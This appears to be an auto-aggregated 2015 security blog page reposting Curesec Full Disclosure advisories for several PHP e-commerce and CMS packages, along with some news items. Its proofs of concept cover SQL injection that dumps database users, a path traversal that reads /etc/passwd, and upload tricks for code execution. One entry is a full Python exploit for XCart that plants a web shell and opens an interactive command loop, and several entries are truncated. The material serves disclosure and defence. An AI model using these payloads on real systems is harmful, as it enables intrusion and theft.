Latest YouTube Video

Saturday, November 14, 2015

FBI denies paying $1 MILLION to Unmask Tor Users

Just day before yesterday, the Tor Project Director Roger Dingledine accused the FBI of paying the Carnegie Mellon University (CMU) at least $1 Million to disclose the technique they had discovered to unmask Tor users and reveal their IP addresses. However, the Federal Bureau of Investigation has denied the claims. In a statement, the FBI spokeswoman said, "The allegation that we paid [


from The Hacker News http://ift.tt/1Lfd2NY
via IFTTT

[FD] AlegroCart 1.2.8: SQL Injection

Security Advisory - Curesec Research Team 1. Introduction Affected Product: AlegroCart 1.2.8 Fixed in: Patch AC128_fix_17102015 Path Link: http://ift.tt/1loeeKd Vendor Website: http://alegrocart.com/ Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 11/13/2015 Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview There is a blind SQL injection in the admin area of AlegroCart. Additionally, there is a blind SQL injection when a customer purchases a product. Because of a required interaction with PayPal, this injection is hard to exploit for an attacker. 3. BLind SQL Injection (Admin) CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description When viewing the list of uploaded files - or images - , the function check_download is called. This function performs a database query with the unsanitized name of the file. Because of this, an attacker can upload a file containing SQL code in its name, which will be executed once files are listed. Note that a similar function - check_filename - is called when deleting a file, making it likely that this operation is vulnerable as well. Admin credentials are required to exploit this issue. Proof of Concept POST /ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download&action=insert HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en; __atuvc=4%7C37 Connection: keep-alive Content-Type: multipart/form-data; boundary

Source: Gmail -> IFTTT-> Blogger

[FD] AlegroCart 1.2.8: LFI/RFI

Security Advisory - Curesec Research Team 1. Introduction Affected Product: AlegroCart 1.2.8 Fixed in: Patch AC128_fix_22102015 Path Link: http://ift.tt/1SPz5kB Vendor Website: http://alegrocart.com/ Vulnerability Type: LFI/RFI Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 11/13/2015 Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 6.5 AV:N/AC:L/Au:S/C:C/I:C/A:C Description When retrieving logs, there are no checks on the given file_path Parameter. Because of this, local or remote files can be included, which are then executed or printed. Admin credentials are required to view logs. 3. Proof of Concept Remote File: POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en Connection: keep-alive Content-Type: multipart/form-data; boundary

Source: Gmail -> IFTTT-> Blogger

[FD] LiteCart 1.3.2: Multiple XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Product: LiteCart 1.3.2 Fixed in: 1.3.3 Fixed Version Link: http://ift.tt/1SPz5kx Vendor Contact: development@litecart.net Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/07/2015 Disclosed to public: 11/13/2015 Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. XSS 1 Description The query parameter of the search is vulnerable to XSS. Proof of Concept http://localhost/ecommerce/litecart-1.3.2/public_html/en/search?query=">Code public_html/pages/search.inc.php document::$snippets['title'][] = empty($_GET['query']) ? language::translate('title_search_results', 'Search Results') : sprintf(language::translate('title_search_results_for_s', 'Search Results for "%s"'), $_GET['query']); 3. XSS 2 Description The value of the GET parameter slide_id is passed to trigger_error if it is an invalid id. trigger_error does not encode input, and as LiteCart shows errors by default, this leads to an XSS vulnerability. Proof of Concept http://localhost/ecommerce/litecart-1.3.2/public_html/admin/?app=slides&doc=edit_slide&page=1&slide_id=Code includes/controllers/ctrl_slide.inc.php if (empty($this->data)) trigger_error('Could not find slide ('. $slide_id .') in database.', E_USER_ERROR); 4. XSS 3 Description The value of the GET parameter doc is passed to trigger_error if it is invalid. trigger_error does not encode input, and as LiteCart shows errors by default, this leads to an XSS vulnerability. Additionally, the accessing of non-existing array values leads to a notice, which contains the index unsanitized. Because of this, $app_config['docs'][$_GET['doc']] can also lead to XSS. Proof of Concept http://localhost/ecommerce/litecart-1.3.2/public_html/admin/?app=appearance&doc=Code admin/index.php if (!empty($_GET['doc'])) { if (empty($app_config['docs'][$_GET['doc']]) || !file_exists(FS_DIR_HTTP_ROOT . WS_DIR_ADMIN . $_GET['app'].'.app/' . $app_config['docs'][$_GET['doc']])) trigger_error($_GET['app'] .'.app/'. $_GET['doc'] . ' is not a valid admin document', E_USER_ERROR); include vmod::check(FS_DIR_HTTP_ROOT . WS_DIR_ADMIN . $_GET['app'].'.app/' . $app_config['docs'][$_GET['doc']]); } else { include vmod::check(FS_DIR_HTTP_ROOT . WS_DIR_ADMIN . $_GET['app'].'.app/' . $app_config['docs'][$app_config['default']]); } 5. Solution To mitigate this issue please upgrade at least to version 1.3.3: http://ift.tt/1SPz5kx Please note that a newer version might already be available. 6. Report Timeline 09/07/2015 Informed Vendor about Issue 10/05/2015 Vendor releases fix 11/13/2015 Disclosed to public Blog Reference: http://ift.tt/1kUvBSa

Source: Gmail -> IFTTT-> Blogger

[FD] ClipperCMS 1.3.0: XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Product: ClipperCMS 1.3.0 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://ift.tt/1NRZoqj Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview There are various XSS vulnerabilities in ClipperCMS 1.3.0. Some require specific non-default settings, while others do not require these settings. 3. XSS 1 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Proof of Concept http://localhost/ClipperCMS-clipper_1.3.0/manager/media/browser/mcpuk/connectors/php/connector.php?foo=bar 4. XSS 2 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description The name, email, message, and subjected parameter of the Contact form are vulnerable to XSS. Contrary to the XSS issues in the admin area described below, these XSS work without clickjacking or specific settings regarding referers. Proof of Concept The POCs for name and subjected are equivalent to this POC for email:
POC for message:
" />
5. XSS 3 CVSS Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description The search field of the System Events page is vulnerable to XSS. To execute the provided POC, the setting "Validate HTTP_REFERER headers" should be set to false. Please note that it is likely possible to exploit this issue via ClickJacking even if that setting is set to true. Proof of Concept
6. XSS 4ff CVSS Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description Multiple parameters of various components of the admin area are vulnerable to XSS. To execute these POC, the setting "Validate HTTP_REFERER headers" should be set to false. Proof of Concept http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=75&r=);}alert(1);function foo(){doRefresh( http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=31&mode=drill&path=foo';alert(1);var bar=' http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=88">&id=1 http://ift.tt/1kUvBBQ">&op=&search=test http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1"> 7. Solution This issue has not been fixed by the vendor. 8. Report Timeline 10/02/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://ift.tt/1kUvBS4

Source: Gmail -> IFTTT-> Blogger

[FD] ClipperCMS 1.3.0: Path Traversal

Security Advisory - Curesec Research Team 1. Introduction Affected Product: ClipperCMS 1.3.0 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://ift.tt/1NRZoqj Vulnerability Type: Path Traversal Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N Description The "file" Parameter of the file browser is vulnerable to directory traversal, allowing the download of arbitrary files. A user account is needed with at least the lowest default role, which is "Editor". 3. Proof of Concept POST /ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/browse.php?type=images&lng=en&act=download HTTP/1.1 dir=images&file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 4. Code /ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/core/browser.php protected function act_download() { $dir = $this->postDir(); if (!isset($this->post['dir']) || !isset($this->post['file']) || (false === ($file = "$dir/{$this->post['file']}")) || !file_exists($file) || !is_readable($file) ) $this->errorMsg("Unknown error."); header("Pragma: public"); header("Expires: 0"); header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); header("Cache-Control: private", false); header("Content-Type: application/octet-stream"); header('Content-Disposition: attachment; filename="' . str_replace('"', "_", $this->post['file']) . '"'); header("Content-Transfer-Encoding:­ binary"); header("Content-Length: " . filesize($file)); readfile($file); die; } 5. Solution This issue has not been fixed by the vendor. 6. Report Timeline 10/02/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://ift.tt/1PH1cTd

Source: Gmail -> IFTTT-> Blogger

[FD] ClipperCMS 1.3.0: SQL Injection

Security Advisory - Curesec Research Team 1. Introduction Affected Product: ClipperCMS 1.3.0 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://ift.tt/1NRZoqj Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview There are multiple SQL Injection vulnerabilities in ClipperCMS 1.3.0. An account with the role "Publisher" or "Administrator" is needed to exploit each of these vulnerabilities. 3. SQL Injection 1 (Blind) CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description The id parameter of the web user editor is vulnerable to blind SQL Injection. To exploit this issue, an account is needed that has the right to manage web users. Users with the role "Publisher" or "Administrator" have this by default. Proof of Concept http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23 -> true http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='4',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23 -> false Code /manager/actions/mutate_web_user.dynamic.php $sql = "SELECT * FROM $dbase.`".$table_prefix."web_groups` where webuser=".$_GET['id'].""; 4. SQL Injection 2 CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description When updating a user, the newusername parameter is vulnerable to SQL injection. To exploit this issue, an account is needed that has the right to manage web users. Users with the role "Publisher" or "Administrator" have this by default. Proof of Concept POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1 mode=12&id=3&blockedmode=0&stay=&oldusername=testtest &newusername=testtest' or extractvalue(1,concat(0x7e,(SELECT concat(user) FROM mysql.user limit 0,1))) -- - &newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo3%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=&gender=&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query Code /manager/processors/save_user_processor.php $sql = "UPDATE " . $modx->getFullTableName('manager_users') . " SET username='$newusername'" . $updatepasswordsql . " WHERE id=$id"; 5. SQL Injection 3 CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description When updating a user, the country, role, blocked, blockeduntil, blockedafter, failedlogincount, and gender parameter are vulnerable to SQL injection. To exploit this issue, an account is needed that has the right to manage web users. Users with the role "Publisher" or "Administrator" have this by default. Proof of Concept The proof of concepts for the country, role, blocked, blockeduntil, failedlogincount, and blockedafter parameter are analog to this POC for gender: POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1 mode=12&id=3&blockedmode=0&stay=&oldusername=testtest&newusername=testtest&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo6%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob= &gender=2', fax=(SELECT concat(user) FROM mysql.user limit 0,1), dob='0 &comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query Visiting the overview page of that user will show the result of the injected query. Code /manager/processors/save_user_processor.php $sql = "UPDATE " . $modx->getFullTableName('user_attributes') . " SET fullname='$fullname', role='$roleid', email='$email', phone='$phone', mobilephone='$mobilephone', fax='$fax', zip='$zip', state='$state', country='$country', gender='$gender', dob='$dob', photo='$photo', comment='$comment', failedlogincount='$failedlogincount', blocked=$blocked, blockeduntil=$blockeduntil, blockedafter=$blockedafter WHERE internalKey=$id"; 6. Solution This issue has not been fixed by the vendor. 7. Report Timeline 10/02/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://ift.tt/1WY2p8Y

Source: Gmail -> IFTTT-> Blogger

[FD] ClipperCMS 1.3.0: CSRF

Security Advisory - Curesec Research Team 1. Introduction Affected Product: ClipperCMS 1.3.0 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://ift.tt/1NRZoqj Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P Description The only protection against CSRF is a referer check. This check can be disabled by a user with the rights to edit settings, thus making the application vulnerable to CSRF. A user may choose to disable referer checks, because when they are enabled, external links or direct entry/bookmarks to specific pages in the backend do not work, which severely limits the usability of the application 3. Solution This issue has not been fixed by the vendor. 4. Report Timeline 10/02/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://ift.tt/1PH1cT9

Source: Gmail -> IFTTT-> Blogger

[FD] ClipperCMS 1.3.0: Code Execution Exploit

[FD] ClipperCMS 1.3.0: Code Execution

Security Advisory - Curesec Research Team 1. Introduction Affected Product: ClipperCMS 1.3.0 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://ift.tt/1NRZoqj Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description The file upload uses a whitelist to only allow non-dangerous file extensions. However, it does allow the upload of .htaccess files, which means that an attacker can upload files with any extension and still gain code execution. An account is required to upload files. The role the account is in needs the right to upload files. By default, the lowest user role - Editor - has this right. 3. Proof of Concept The file upload can be found here: http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=31 To gain code execution, upload a .htaccess file with the content: AddType application/x-httpd-php .png Now, any uploaded file containing PHP code with the extension .png will be executed. 3. Solution This issue has not been fixed by the vendor. 4. Report Timeline 10/02/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://ift.tt/1WY2qcY

Source: Gmail -> IFTTT-> Blogger

[FD] dotclear 2.8.1: XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Product: dotclear 2.8.1 Fixed in: 2.8.2 Fixed Version Link: http://ift.tt/1MdcPPc Vendor Website: http://dotclear.org/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description The Comment author name is echoed inside the value attribute of an input tag when viewing the list of all comments for that author. Quotes are not encoded, which allows for the addition of further attributes to the tag. The field is hidden, so onfocus or similar do not work, and the length of the name is limited, which makes an actual exploitation unlikely. Still, with older browser an attacker might try to inject a style attribute which may lead to XSS. 3. Proof of Concept 1. Create comment with author name " newattribute="value 2. Visit http://localhost/dotclear/admin/comments.php?n=30&status=&sortby=comment_dt&order=desc&author=%22+newattribute%3D%22value 3. The result will be:
4. Solution To mitigate this issue please upgrade at least to version 2.8.2: http://ift.tt/1MdcPPc Please note that a newer version might already be available. 5. Report Timeline 10/02/2015 Informed Vendor 10/25/2015 Vendor releases fix 11/13/2015 Disclosed to public Blog Reference: http://ift.tt/1WY2oSA

Source: Gmail -> IFTTT-> Blogger

[FD] dotclear 2.8.1: Code Execution

Security Advisory - Curesec Research Team 1. Introduction Affected Product: dotclear 2.8.1 Fixed in: 2.8.2 Fixed Version Link: http://ift.tt/1MdcPPc Vendor Website: http://dotclear.org/ Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description While upload of files with extension php, php4, and php5 is forbidden, upload of files with the extension pht, phps, and phtml is allowed, which will lead to code execution with most default Apache configurations. The upload form is located here: http://localhost/dotclear/admin/media.php?popup=1&plugin_id=dcLegacyEditor A user with the right "manage their own media items" and "manage their own entries and comments" is needed to exploit this issue. 3. Code /dotclear/inc/libs/clearbricks/filemanager public function uploadFile($tmp,$dest,$overwrite=false) { $dest = $this->pwd.'/'.path::clean($dest); if ($this->isFileExclude($dest)) { throw new Exception(__('Uploading this file is not allowed.')); } [...] if (@move_uploaded_file($tmp,$dest) === false) { throw new Exception(__('An error occurred while writing the file.')); } [...] } [...] protected function isFileExclude($f) { if (!$this->exclude_pattern) { return false; } return preg_match($this->exclude_pattern,$f); } /dotclear/inc/core/class.dc.media.php $this->exclude_pattern = $core->blog->settings->system->media_exclusion; /dotclear/inc/core/class.dc.core.php array('media_exclusion','string','/\.php[0-9]*$/i', 'File name exclusion pattern in media manager. (PCRE value)'), Note that after installation, the regex is retrieved from the settings table of the database, not from the code. 4. Solution To mitigate this issue please upgrade at least to version 2.8.2: http://ift.tt/1MdcPPc Please note that a newer version might already be available. 5. Report Timeline 10/02/2015 Informed Vendor 10/25/2015 Vendor releases fix 11/13/2015 Disclosed to public Blog Reference: http://ift.tt/1WY2pWE

Source: Gmail -> IFTTT-> Blogger

[FD] Open Source Social Network 3.5: XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Open Source Social Network 3.5 Product: Fixed in: 3.6 Fixed Version http://ift.tt/1MdcPPa Link: ossn-v3.6-1443545762.zip Vendor Contact: http://ift.tt/1NRZpup Vulnerability XSS Type: Remote Yes Exploitable: Reported to 09/29/2015 vendor: Disclosed to 11/13/2015 public: Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview There are two reflected XSS vulnerabilities in Open Source Social Network 3.5. With this, it is possible to inject JavaScript keyloggers, or to bypass CSRF protection, which in this case may lead to code execution. 3. XSS 1 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Proof of Concept http://localhost/ossn/search?q='">Code /ossn/themes/default/plugins/menus/search.php $menus = $params['menu']; echo "

Bug in Gmail app for Android Allows anyone to Send Spoofed Emails

A security researcher has discovered an interesting loophole in Gmail Android app that lets anyone send an email that looks like it was sent by someone else, potentially opening doors for Phishers. This is something that we call E-mail Spoofing – the forgery of an e-mail header so that the email appears to have originated from someone other than the actual source. Generally, to spoof


from The Hacker News http://ift.tt/1SPvuD7
via IFTTT

[FD] Sitemagic CMS 4.1: XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Sitemagic CMS 4.1 Product: Fixed in: 4.1.1 Fixed Version http://ift.tt/1MIfaTR Link: SMDownloadsFile=SitemagicCMS411.zip Vendor Contact: dev@sitemagic.org Vulnerability XSS Type: Remote Yes Exploitable: Reported to 09/29/2015 vendor: Disclosed to 11/13/2015 public: Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description If debug is enabled - which it is by default - the values of POST and GET are echoed unencoded, leading to an XSS vulnerability. With this, it is possible to inject JavaScript keyloggers, or to bypass CSRF protection, which in this case may lead to code execution. 3. Proof of Concept http://localhost/Sitemagic/?dump=true&foo='">4. Code index.php if ($debug === true) { $end = microtime(true); if (isset($_REQUEST["dump"]) === true) { $time = $end - $start; echo "
Memory usage: " . memory_get_usage(true) / 1024 . " KB"; echo "
Time usage: " . $time . " seconds"; echo "

POST

" . print_r($_POST, true) . "

GET

" . print_r($_GET, true) . "
"; } } 5. XSS to Code Execution Because the file upload in the admin area does not restrict the file type, an attacker can gain code execution via the XSS vulnerability. http://localhost/Sitemagic/?dump=true&foo=">/s.js: submitRequest(); function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/Sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages%2Fdemo", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary

Source: Gmail -> IFTTT-> Blogger

[FD] Thelia 2.2.1: XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Thelia 2.2.1 Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: info@thelia.net Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 11/13/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description Thelia 2.2.1 suffers from an XSS vulnerability. With this, it is for example possible to inject JavaScript keyloggers, or to bypass CSRF protection. 3. Proof of Concept http://localhost/thelia_2.1.5/web/admin/home/stats?month=95&year=20155 4. Solution This issue has not been fixed by the vendor 5. Report Timeline 09/29/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://ift.tt/1MIfaTL

Source: Gmail -> IFTTT-> Blogger

[FD] TomatoCart v1.1.8.6.1: XSS

Security Advisory - Curesec Research Team 1. Introduction Affected Product: TomatoCart v1.1.8.6.1 Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: support@tomatocart.com Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 11/13/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview There are two reflected XSS vulnerabilities in TomatoCart v1.1.8.6.1. With this, it is possible to inject JavaScript keyloggers, or to bypass CSRF protection, which in the case of TomatoCart may lead to code execution. 3. XSS 1 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Proof of Concept http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/info.php?faqs&faqs_id='">Code templates/bootstrap/content/info/faqs.php:70 if(question.getParent().id == 'faq') { question.getElement('i').set('class', 'icon-minus'); question.getNext().setStyle('display', ''); } 4. XSS 2 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Proof of Concept http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/checkout.php?checkout&view='">Code templates/bootstrap/content/checkout/checkout.php:182 view: '', 5. Solution This issue has not been fixed by the vendor 6. Report Timeline 09/29/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://ift.tt/1MIfaTH

Source: Gmail -> IFTTT-> Blogger

[FD] TomatoCart v1.1.8.6.1: Code Execution

Security Advisory - Curesec Research Team 1. Introduction Affected Product: TomatoCart v1.1.8.6.1 Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: support@tomatocart.com Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 11/13/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview TomatoCart has multiple locations where the upload of images is allowed. In two of these locations, the file type and extension of the uploaded file are not checked, which leads to code execution. Please note that an admin account with at least some privileges is required to exploit this issue. 3. Code Execution 1 CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description When uploading a new slide image, there are no checks as to what type the uploaded image actually is. Because of this, an attacker that gained admin credentials can upload a PHP file and thus gain code execution. The rights needed are Content -> Slide Images. Proof of Concept curl -i -s -k -X 'POST' \ -H 'Content-Type: multipart/form-data; boundary

Source: Gmail -> IFTTT-> Blogger

[FD] XCart 5.2.6: Code Execution Exploit

#!/usr/local/bin/python # Exploit for XCart 5.2.6 Code Execution vulnerability # An admin account is required to use this exploit # Curesec GmbH import sys import re import requests # requires requests lib if len(sys.argv) != 4: exit("usage: python " + sys.argv[0] + " http://ift.tt/1MIfaDl admin@example.com admin") url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] loginPath = "/admin.php?target=login" fileManagerPath = "/admin.php?target=logo_favicon" shellFileName = "404.php" shellContent = "GIF89a;" def login(requestSession, url, username, password): csrfRequest = requestSession.get(url) csrfTokenRegEx = re.search('name="xcart_form_id" type="hidden" value="(.*)" class', csrfRequest.text) csrfToken = csrfTokenRegEx.group(1) postData = {"target": "login", "action": "login", "xcart_form_id": csrfToken, "login": username, "password": password} loginResult = requestSession.post(url, data = postData).text return "Invalid login or password" not in loginResult def upload(requestSession, url, fileName, fileContent): csrfRequest = requestSession.get(url) csrfTokenRegEx = re.search('SimpleCMS" />\n
', csrfRequest.text) csrfToken = csrfTokenRegEx.group(1) filesData = {"logo": (fileName, fileContent)} postData = {"target": "logo_favicon", "action": "update", "page": "CDev\SimpleCMS", "xcart_form_id": csrfToken} uploadResult = requestSession.post(url, files = filesData, data = postData) return "The data has been saved successfully" in uploadResult.text def runShell(url): print("enter command, or enter exit to quit.") command = raw_input("$ ") while "exit" not in command: print(requests.get(url + command).text.replace("GIF89a;", "")) command = raw_input("$ ") requestSession = requests.session() if login(requestSession, url + loginPath, username, password): print("successful: login") else: exit("ERROR: Incorrect username or password") if upload(requestSession, url + fileManagerPath, shellFileName, shellContent): print("successful: file uploaded") else: exit("ERROR: could not upload file") runShell(url + shellFileName + "?x=") Blog Reference: http://ift.tt/1SPwiI3

Source: Gmail -> IFTTT-> Blogger

[FD] XCart 5.2.6: Code Execution

Security Advisory - Curesec Research Team 1. Introduction Affected Product: XCart 5.2.6 Fixed in: 5.2.7 Fixed Version Link: http://ift.tt/1j0phqZ Vendor Contact: support@x-cart.com Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 08/13/2015 Disclosed to public: 11/04/2015 Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description When uploading a favicon (http://localhost/anew/xcart/admin.php?target= logo_favicon), there is no check as to what type or extension the file has. This allows an attacker that gained admin credentials to upload a PHP file and thus gain code execution. 3. Solution To mitigate this issue please upgrade at least to version 5.2.7: http://ift.tt/1j0phqZ Please note that a newer version might already be available. 4. Report Timeline 08/13/2015 Informed Vendor about Issue 09/03/2015 Vendor Requests more time 10/19/2015 Vendor releases fix 11/04/2015 Disclosed to public Blog Reference: http://ift.tt/1SPwfMB

Source: Gmail -> IFTTT-> Blogger

[FD] XCart 5.2.6: Path Traversal

